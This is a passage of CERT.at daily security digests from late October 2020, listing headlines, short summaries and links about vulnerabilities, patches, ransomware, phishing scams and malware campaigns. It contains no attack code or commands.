Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be [...]
---------------------------------------------
https://msrc-blog.microsoft.com:443/2020/10/29/attacks-exploiting-netlogon-…
∗∗∗ Security vulnerabilities: Nvidia releases BMC firmware updates for DGX servers ∗∗∗
---------------------------------------------
Nine security vulnerabilities have been removed from the AMI BMC firmware for Nvidia's deep-learning servers DGX-1, DGX-2 and DGX A100, one of which is rated critical.
---------------------------------------------
https://heise.de/-4943948
∗∗∗ Vulnerability Spotlight: Multiple vulnerabilities in Synology SRM (Synology Router Manager) ∗∗∗
---------------------------------------------
Cisco Talos recently discovered multiple remote vulnerabilities in software that helps power Synology routers. The bugs exist in Synology Router Manager (SRM) - a Linux-based operating system for Synology routers - and QuickConnect, a feature inside SRM that allows users to remotely connect to their routers. An adversary could use these vulnerabilities to carry out a range of [...]
---------------------------------------------
https://blog.talosintelligence.com/2020/10/vulnerability-spotlight-multiple…
∗∗∗ October 29, 2020 TNS-2020-07 [R1] Nessus Agent 8.2.0 Fixes One Vulnerability ∗∗∗
---------------------------------------------
http://www.tenable.com/security/tns-2020-07
∗∗∗ October 29, 2020 TNS-2020-08 [R1] Nessus 8.12.1 Fixes One Vulnerability ∗∗∗
---------------------------------------------
http://www.tenable.com/security/tns-2020-08
∗∗∗ Wireshark: Multiple vulnerabilities enable denial of service ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1054
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 28-10-2020 18:00 − Thursday 29-10-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Upcoming Security Updates for Adobe Acrobat and Reader (APSB20-67) ∗∗∗
---------------------------------------------
A prenotification security advisory (APSB20-67) has been posted regarding upcoming Adobe Acrobat and Reader updates scheduled for Tuesday, November 03, 2020. We will continue to provide updates on the upcoming release via the Security Bulletins and Advisories page as well as the Adobe PSIRT Blog. This posting is provided “AS IS” with no warranties and [...]
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1936
∗∗∗ CPU: ME hackers crack Intel microcode updates ∗∗∗
---------------------------------------------
Security researchers can decrypt and examine the microcode updates for Intel CPUs. A takeover is not yet possible with this.
---------------------------------------------
https://www.golem.de/news/cpu-me-hacker-knacken-intel-microcode-updates-201…
∗∗∗ 5 Places Where You’d Never Expect to Get Hacked ∗∗∗
---------------------------------------------
For every gleaming new IoT device that hits the market, a hacker somewhere is figuring out how to compromise it. Today, even routine activities can land you in the sights of a bad actor.
---------------------------------------------
https://blog.sucuri.net/2020/10/5-places-where-youd-never-expect-to-get-hac…
∗∗∗ Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser ∗∗∗
---------------------------------------------
Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-w…
∗∗∗ Patch now! Attackers are scanning for vulnerable Oracle WebLogic servers ∗∗∗
---------------------------------------------
Admins should bring their WebLogic servers up to date for security reasons.
---------------------------------------------
https://heise.de/-4942360
∗∗∗ Ransomware: Maze apparently shuts down, REvil makes 100 million US dollars ∗∗∗
---------------------------------------------
Ransomware is still the star of the malware scene. The masterminds keep expanding their "business model" and reap revenues in the millions.
---------------------------------------------
https://heise.de/-4942549
∗∗∗ ESET Threat Report for Q3 2020 ∗∗∗
---------------------------------------------
The threat landscape in the second quarter of 2020 as seen by ESET telemetry and ESET security researchers.
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/10/28/eset-threat-report-fuer-d…
∗∗∗ Domain Parking: A Gateway to Attackers Spreading Emotet and Impersonating McAfee ∗∗∗
---------------------------------------------
Domain parking might appear harmless at first glance, but parked domains can redirect visitors to unwanted landing pages or turn entirely malicious.
---------------------------------------------
https://unit42.paloaltonetworks.com/domain-parking/
=====================
= Vulnerabilities =
=====================
∗∗∗ Code vulnerabilities put health records at risk ∗∗∗
---------------------------------------------
OpenEMR is the most popular open source software for electronic health record and medical practice management. It is used world-wide to manage sensitive patient data, including information about medications, laboratory values, and diseases. [...] During our security research of popular web applications, we discovered several code vulnerabilities in OpenEMR 5.0.2.1. A combination of these vulnerabilities allowed remote attackers to execute arbitrary system commands on any OpenEMR server that [...]
---------------------------------------------
https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability
∗∗∗ Samba: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in Samba to disclose information or cause a denial of service.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1051
∗∗∗ F5 BIG-IP: Multiple vulnerabilities ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit multiple vulnerabilities in F5 BIG-IP to carry out a denial of service attack, disclose information or carry out a cross-site scripting attack.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1052
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (linux-4.19), Fedora (tcpreplay, xen, and yubihsm-shell), SUSE (pacemaker), and Ubuntu (gosa and pam-python).
---------------------------------------------
https://lwn.net/Articles/835552/
∗∗∗ Security Bulletin: IBM Security Directory Suite is affected by security vulnerability (CVE-2018-4441) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-su…
∗∗∗ Security Bulletin: Multiple security vulnerabilities have been identified in IBM® Java SDK that affect IBM Security Directory Suite – October 2019 CPU ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: IBM i2 Analyst's Notebook Memory Corruption Vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-i2-analysts-notebook-…
∗∗∗ Security Bulletin: IBM Resilient OnPrem could allow an attacker on a restricted internal network to provide the server with a spoofed source IP address. (CVE-2020-4864) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-onprem-coul…
∗∗∗ Security Bulletin: Embedded WebSphere Application Server is vulnerable to an information disclosure vulnerability that affects Content Collector for Email ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-embedded-websphere-applic…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data – Golang (CVE-2020-16845) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-struts-publicly-di…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 27-10-2020 18:00 − Wednesday 28-10-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ How to protect yourself from phishing attacks in your web browser ∗∗∗
---------------------------------------------
Currently, a great many phishing attempts are being reported to Watchlist Internet. The fraudsters are becoming ever more sophisticated. So that you can better protect yourself against fraudulent phishing sites, we show you step by step how to enable phishing warnings in Google Chrome and Firefox.
---------------------------------------------
https://www.watchlist-internet.at/news/so-schuetzen-sie-sich-im-webbrowser-…
∗∗∗ LokiBot Malware: What it is and how to respond to it ∗∗∗
---------------------------------------------
The Cybersecurity and Infrastructure Agency (CISA) of the U.S. Department of Homeland Security recently announced that activity in LokiBot, a form of aggressive malware, has increased dramatically over the last two months. The activity increase was discovered by an automated intrusion detection system referred to as EINSTEIN, which the Department of Homeland Security uses for collecting and analyzing security information across numerous [...]
---------------------------------------------
https://cybersecurity.att.com/blogs/security-essentials/lokibot-malware-wha…
∗∗∗ Microsoft Defender ATP scares admins with false Cobalt Strike alerts ∗∗∗
---------------------------------------------
Administrators woke up to a scary surprise today after false positives in Microsoft Defender ATP showed network devices infected with Cobalt Strike.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-atp-scar…
∗∗∗ Facebook "copyright violation" tries to get past 2FA - don’t fall for it! ∗∗∗
---------------------------------------------
Watch out for "Facebook copyright violation" emails - even if they link straight back to Facebook.com
---------------------------------------------
https://nakedsecurity.sophos.com/2020/10/27/facebook-copyright-violation-tr…
∗∗∗ SMBGhost - the critical vulnerability many seem to have forgotten to patch, (Wed, Oct 28th) ∗∗∗
---------------------------------------------
You probably remember that back in March, Microsoft released a patch for a vulnerability in SMBv3 dubbed SMBGhost (CVE-2020-0796), since at that time, it received as much media attention as was reasonable for a critical (CVSS 10.0) vulnerability in Windows, which might lead to remote code execution[1].
---------------------------------------------
https://isc.sans.edu/diary/rss/26732
∗∗∗ Hörmann - Open Door Day for everyone... ∗∗∗
---------------------------------------------
SEC Consult's identification of potential vulnerabilities proved helpful in improving the entire BiSecur system.
---------------------------------------------
https://www.sec-consult.com/./blog/2020/10/hoermann-tag-der-offenen-tuer-fu…
∗∗∗ TrickBot Linux Variants Active in the Wild Despite Recent Takedown ∗∗∗
---------------------------------------------
Efforts to disrupt TrickBot may have shut down most of its critical infrastructure, but the operators behind the notorious malware aren't sitting idle. According to new findings shared by cybersecurity firm Netscout, TrickBot's authors have moved portions of their code to Linux in an attempt to widen the scope of victims that could be targeted.
---------------------------------------------
https://thehackernews.com/2020/10/trickbot-linux-variants-active-in-wild.ht…
∗∗∗ Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine ∗∗∗
---------------------------------------------
Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats within a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM.
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2020/10/threatpursuit-vm-threat…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (blueman), Fedora (nodejs), Gentoo (firefox), openSUSE (kleopatra), Oracle (java-1.8.0-openjdk), SUSE (apache2, binutils, firefox, pacemaker, sane-backends, spice, spice-gtk, tomcat, virt-bootstrap, xen, and zeromq), and Ubuntu (ca-certificates, mariadb-10.1, mariadb-10.3, netty, openjdk-8, openjdk-lts, perl, and tomcat6).
---------------------------------------------
https://lwn.net/Articles/835497/
∗∗∗ Security update: Attackers could execute their own commands on Qnap NAS ∗∗∗
---------------------------------------------
Qnap network storage devices can be attacked via two vulnerabilities. A patch provides a remedy.
---------------------------------------------
https://heise.de/-4941315
∗∗∗ MediaWiki: Vulnerability enables cross-site scripting ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1048
∗∗∗ Red Hat OpenShift: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1049
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Jul 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affects IBM Tivoli System Automation Application Manager Jul 2020 (CVE-2020-2590) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect ITCAM for SOA (July 2020) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: A security vulnerability in Node.js serialize-javascript affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: Security vulnerability in Java SE affects Rational Build Forge (CVE-2020-2601) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-in…
∗∗∗ Security Bulletin: Vulnerability in Network Time Protocol (NTP) affects IBM Virtualization Engine TS7700 (CVE-2020-11868) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-network-…
∗∗∗ Security Bulletin: Security vulnerabilities in Java SE affect Rational Build Forge ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: A security vulnerability in Node.js jison affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: IBM WebSphere Cast Iron Solution & App Connect Professional is affected by Apache Tomcat vulnerabilities. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-cast-iron-s…
∗∗∗ Security Bulletin: A Remote Vulnerability Affects IBM Sterling Connect:Direct for Microsoft Windows (CVE-2020-4767) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-remote-vulnerability-af…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 23-10-2020 18:00 − Tuesday 27-10-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Caution: Fraudulent FinanzOnline e-mail in circulation ∗∗∗
---------------------------------------------
Fake e-mails in the name of the tax office are currently circulating. The e-mail informs you about your tax refund and asks you to approve the transaction. Under no circumstances click on the link: you will land on a fake FinanzOnline website that allows criminals to harvest personal data and credit card details!
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-betruegerisches-finanzonlin…
∗∗∗ Industrial plants with OPC UA systematically poorly configured ∗∗∗
---------------------------------------------
Researchers at Fraunhofer FKIE and RWTH Aachen searched the internet for controllers based on the OPC UA standard. 92% were configured insecurely.
---------------------------------------------
https://heise.de/-4939199
∗∗∗ Security update: Attackers are attacking Microsoft's Edge web browser ∗∗∗
---------------------------------------------
Microsoft's developers have closed several security vulnerabilities in the Edge web browser.
---------------------------------------------
https://heise.de/-4940091
∗∗∗ Emotet malware hides behind fake upgrade for Microsoft Word ∗∗∗
---------------------------------------------
A new campaign tricks victims into believing they need an upgrade with new features for Microsoft Word. In reality, they are meant to disable the security precautions that protect against dangerous macros. The masterminds continue to distribute the malicious documents by e-mail.
---------------------------------------------
https://www.zdnet.de/88389137/malware-emotet-versteckt-sich-hinter-gefaelsc…
∗∗∗ KashmirBlack: Botnet attacks WordPress, Joomla and Drupal ∗∗∗
---------------------------------------------
The masterminds exploit known vulnerabilities in CMS platforms and plug-ins. Through these they inject a cryptominer. According to Imperva, the botnet now has a "massive infrastructure".
---------------------------------------------
https://www.zdnet.de/88389169/kashmirblack-botnet-attackiert-wordpress-joom…
∗∗∗ New RAT malware gets commands via Discord, has ransomware feature ∗∗∗
---------------------------------------------
The new Abaddon remote access trojan may be the first to use Discord as a full-fledged command and control server that instructs the malware on what tasks to perform on an infected PC. Even worse, a ransomware feature is being developed for the malware.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-command…
∗∗∗ Massive Nitro data breach impacts Microsoft, Google, Apple, more ∗∗∗
---------------------------------------------
A massive data breach suffered by the Nitro PDF service impacts many well-known organizations, including Google, Apple, Microsoft, Chase, and Citibank.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/massive-nitro-data-breach-im…
∗∗∗ Study of the ShadowPad APT backdoor and its relation to PlugX ∗∗∗
---------------------------------------------
In July 2020, we released a study of targeted attacks on state institutions in Kazakhstan and Kyrgyzstan with a detailed analysis of malware found in compromised networks. During the investigation, Doctor Web specialists analyzed and described several groups of trojan programs, including new samples of trojan families already encountered by our virus analysts, as well as previously unknown trojans.
---------------------------------------------
https://news.drweb.com/show/?i=14048&lng=en&c=9
∗∗∗ Majority of Microsoft 365 Admins Don’t Enable MFA ∗∗∗
---------------------------------------------
Beyond admins, researchers say that 97 percent of all total Microsoft 365 users do not use multi-factor authentication.
---------------------------------------------
https://threatpost.com/microsoft-365-admins-mfa/160592/
∗∗∗ LinkedIn, Instagram Vulnerable to Preview-Link RCE Security Woes ∗∗∗
---------------------------------------------
Popular chat apps, including LINE, Slack, Twitter DMs and others, can also leak location data and share private info with third-party servers.
---------------------------------------------
https://threatpost.com/linkedin-instagram-preview-link-rce-security/160600/
∗∗∗ Excel 4 Macros: "Abnormal Sheet Visibility", (Mon, Oct 26th) ∗∗∗
---------------------------------------------
Excel 4 macros are composed of formulas (commands) and values stored inside a sheet.
---------------------------------------------
https://isc.sans.edu/diary/rss/26726
∗∗∗ Password Security & Password Managers ∗∗∗
---------------------------------------------
In the spirit of National Cyber Security Awareness Month (NCSAM), let’s talk about a security basic that many people overlook: passwords. These are one of the most fundamental aspects of website security, yet we too often see webmasters taking a lax approach to secure passwords. In fact, the online security provider TeamPassword found that last year the most commonly leaked password was 123456. That edges out some real gems including qwerty and the always-popular password.
---------------------------------------------
https://blog.sucuri.net/2020/10/password-security-password-managers.html
∗∗∗ P.A.S. Fork v. 1.0 — A Web Shell Revival ∗∗∗
---------------------------------------------
A PHP shell containing multiple functions can easily consist of thousands of lines of code, so it’s no surprise that attackers often reuse the code from some of the most popular PHP web shells, like WSO or b374k. After all, if these popular (and readily available) PHP web shells do the job, there’s no need to code an entirely new tool.
---------------------------------------------
https://blog.sucuri.net/2020/10/p-a-s-fork-v-1-0-a-web-shell-revival.html
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#760767: Macrium Reflect is vulnerable to privilege escalation due to OPENSSLDIR location ∗∗∗
---------------------------------------------
Overview
Macrium Reflect contains a privilege escalation vulnerability due to the use of an OPENSSLDIR variable that specifies a location where an unprivileged Windows user can create files.
Description
CVE-2020-10143
Macrium Reflect includes an OpenSSL component that specifies an OPENSSLDIR variable as C:\openssl\. Macrium Reflect contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create [...]
---------------------------------------------
https://kb.cert.org/vuls/id/760767
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (thunderbird), Fedora (createrepo_c, dnf-plugins-core, dnf-plugins-extras, librepo, livecd-tools, and pdns-recursor), openSUSE (firefox and mailman), Oracle (firefox), Red Hat (chromium-browser, java-1.8.0-openjdk, and Satellite 6.8), Scientific Linux (java-1.8.0-openjdk), SUSE (libvirt), and Ubuntu (blueman, firefox, mysql-5.7, mysql-8.0, php7.4, and ruby-kramdown).
---------------------------------------------
https://lwn.net/Articles/835401
∗∗∗ HPE/Aruba: Critical vulnerabilities in SSMC, AirWave Glass and other products ∗∗∗
---------------------------------------------
Update now: Among other things, a vulnerability with the highest severity rating in the StoreServ Management Console could make unauthorized remote access easy for attackers.
---------------------------------------------
https://heise.de/-4938532
∗∗∗ NVIDIA Patches Code Execution Flaws in GeForce Experience ∗∗∗
---------------------------------------------
Patches released by NVIDIA last week for the GeForce Experience software address two arbitrary code execution bugs assessed with a severity rating of high.
---------------------------------------------
https://www.securityweek.com/nvidia-patches-code-execution-flaws-geforce-ex…
∗∗∗ Trend Micro AntiVirus for Mac: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1047
∗∗∗ Red Hat OpenShift: Vulnerability enables denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1045
∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is vulnerable to social engineering attacks (CVE-2020-4337) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Platform Symphony and IBM Spectrum Symphony ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerabilities in Curl affect PowerSC (CVE-2020-8169, CVE-2020-8177) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-curl-a…
∗∗∗ Security Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2020-11868, CVE-2020-13817, and CVE-2020-15025) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ntpv4-…
∗∗∗ Security Bulletin: CVE-2020-15190 for Tensorflow in Watson Machine Learning Community Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-15190-for-tensor…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 22-10-2020 18:00 − Friday 23-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ R_Evil WordPress Hacktool & Malicious JavaScript Injections ∗∗∗
---------------------------------------------
We often see hackers reusing the same malware, with only a few new adjustments to obfuscate the code so that it is more difficult for scanning tools to detect. However, sometimes entirely new attack tools are created and deployed by threat actors who don’t want to rely on obfuscating existing malware.
---------------------------------------------
https://blog.sucuri.net/2020/10/r_evil-wordpress-hacktool-malicious-javascr…
∗∗∗ Numerous new fake shops lure with cheap offers and good customer service ∗∗∗
---------------------------------------------
Readers of Watchlist Internet are currently reporting numerous newly registered fake shops, all of which are built alike and use the same texts. High-quality products, a strong customer service team and easy returns are promised. But in reality, criminals are behind these supposed online shops.
---------------------------------------------
https://www.watchlist-internet.at/news/zahlreiche-neue-fake-shops-locken-mi…
∗∗∗ Securing medical devices: Can a hacker break your heart? ∗∗∗
---------------------------------------------
Why are connected medical devices vulnerable to attack and how likely are they to get hacked? Here are five digital chinks in the armor.
---------------------------------------------
https://www.welivesecurity.com/2020/10/23/securing-medical-devices-hack-hea…
∗∗∗ Practical example of fuzzing OPC UA applications ∗∗∗
---------------------------------------------
We continue to describe our approaches to searching for vulnerabilities in industrial systems based on the OPC UA protocol. In this article, we examine new techniques that can be used to search for memory corruption vulnerabilities if the source code is available. We also discuss an example of fuzzing using libfuzzer.
---------------------------------------------
https://ics-cert.kaspersky.com/reports/2020/10/19/practical-example-of-fuzz…
=====================
= Vulnerabilities =
=====================
∗∗∗ VMware Horizon Server and VMware Horizon Client updates address multiple security vulnerabilities (CVE-2020-3997, CVE-2020-3998) ∗∗∗
---------------------------------------------
VMware Horizon Server does not correctly validate user input. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.1.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0024.html
∗∗∗ Security update: Nvidia GeForce Experience makes PCs attackable in multiple ways ∗∗∗
---------------------------------------------
Nvidia's developers have closed three security vulnerabilities in the GeForce Experience graphics card tool.
---------------------------------------------
https://heise.de/-4937481
∗∗∗ Cisco Adaptive Security Appliance Software SSL/TLS Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Jul 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect z/TPF ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring embedded WebSphere Application and IHS server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager Jul 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Enterprise Content Management System Monitor is affected by a vulnerability in IBM® SDK Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-enterprise-content-manage…
∗∗∗ Multiple Vulnerabilities in PubliXone ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-pu…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 21-10-2020 18:00 − Donnerstag 22-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ These are the winners of Austria's largest hacker competition ∗∗∗
---------------------------------------------
The final of the Austria Cyber Security Challenge 2020 was held virtually. The winners have been determined.
---------------------------------------------
https://futurezone.at/digital-life/das-sind-die-gewinner-von-oesterreichs-g…
∗∗∗ BazarLoader phishing lures: plan a Halloween party, get a bonus and be fired in the same afternoon, (Thu, Oct 22nd) ∗∗∗
---------------------------------------------
Phishing messages distributing BazarLoader have come to be commonplace in the past six months, but in the last couple of weeks I've been seeing more and more e-mails spreading this malware caught in my quarantine. Although the contents of these messages differ, their appearance is usually similar [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/26710
∗∗∗ XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability ∗∗∗
---------------------------------------------
This tech support scam is being spread via Facebook links and uses several redirection mechanisms to avoid detection.
---------------------------------------------
https://blog.malwarebytes.com/cybercrime/2020/10/xss-to-tss-tech-support-sc…
∗∗∗ Abusing RDP’s Remote Credential Guard with Rubeus PTT ∗∗∗
---------------------------------------------
TL;DR Microsoft’s Remote Credential Guard (RCG) for RDP protects creds if an RDP server is compromised. It leaves little scope for password or NTLM credential dumping when a user connects [...]
---------------------------------------------
https://www.pentestpartners.com/security-blog/abusing-rdps-remote-credentia…
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#208577: Chocolatey Boxstarter vulnerable to privilege escalation due to weak ACLs ∗∗∗
---------------------------------------------
Chocolatey Boxstarter fails to properly set ACLs, which can allow an unprivileged Windows user to be able to run arbitrary code with SYSTEM privileges.
---------------------------------------------
https://kb.cert.org/vuls/id/208577
∗∗∗ Dangerous vulnerabilities in Cisco software for network protection and management ∗∗∗
---------------------------------------------
Network equipment vendor Cisco has released important security updates for various network software products. None of the vulnerabilities is rated critical.
---------------------------------------------
https://heise.de/-4936512
∗∗∗ Vulnerability Spotlight: A deep dive into WAGO’s cloud connectivity and the vulnerabilities that arise ∗∗∗
---------------------------------------------
WAGO makes several programmable automation controllers that are used in many industries including automotive, rail, power engineering, manufacturing and building management. Cisco Talos discovered 41 vulnerabilities in their PFC200 and PFC100 controllers.
---------------------------------------------
https://blog.talosintelligence.com/2020/10/vulnerability-spotlight-deep-div…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: A security vulnerability in Node.js node-fetch module affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: A security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Infrastructure Management. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 20-10-2020 18:00 − Mittwoch 21-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ TrickBot malware under siege from all sides, and it's working ∗∗∗
---------------------------------------------
The Trickbot malware operation is on the brink of going down completely following efforts from an alliance of cybersecurity and hosting providers targeting the botnet's command and control servers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/trickbot-malware-under-siege…
∗∗∗ LockBit ransomware moves quietly on the network, strikes fast ∗∗∗
---------------------------------------------
LockBit ransomware takes as little as five minutes to deploy the encryption routine on target systems once it lands on the victim network.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-moves-qui…
∗∗∗ Shipping dangerous goods, (Wed, Oct 21st) ∗∗∗
---------------------------------------------
